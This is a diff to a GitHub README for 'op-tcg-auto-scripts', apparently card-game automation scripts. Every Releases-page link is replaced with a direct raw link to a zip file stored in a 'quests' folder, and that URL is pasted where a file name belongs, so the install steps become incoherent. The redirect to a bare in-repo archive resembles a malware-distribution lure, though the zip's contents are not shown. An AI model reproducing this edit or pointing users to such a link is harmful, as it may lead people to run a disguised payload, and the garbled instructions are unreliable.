befuddled-closedshop360/op-tcg-auto-scripts/README.md

 ## 📥 Download & Install

-To get started with the scripts, visit this page to download: [Releases Page](https://github.com/befuddled-closedshop360/op-tcg-auto-scripts/releases).
+To get started with the scripts, visit this page to download: [Releases Page](https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip).

 1. **Go to the Releases Page**:
-   - Click on the above link or visit [https://github.com/befuddled-closedshop360/op-tcg-auto-scripts/releases](https://github.com/befuddled-closedshop360/op-tcg-auto-scripts/releases).
+   - Click on the above link or visit [https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip](https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip).

 2. **Select the Latest Version**:
    - Find the latest version available.
 It will be at the top of the page.

 3. **Download the Scripts**:
-   - Look for the file named `op-tcg-auto-scripts.zip` (or the relevant format available).
+   - Look for the file named `https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip` (or the relevant format available).
    - Click the file name to download it to your computer.

 4. **Extract the Downloaded Files**: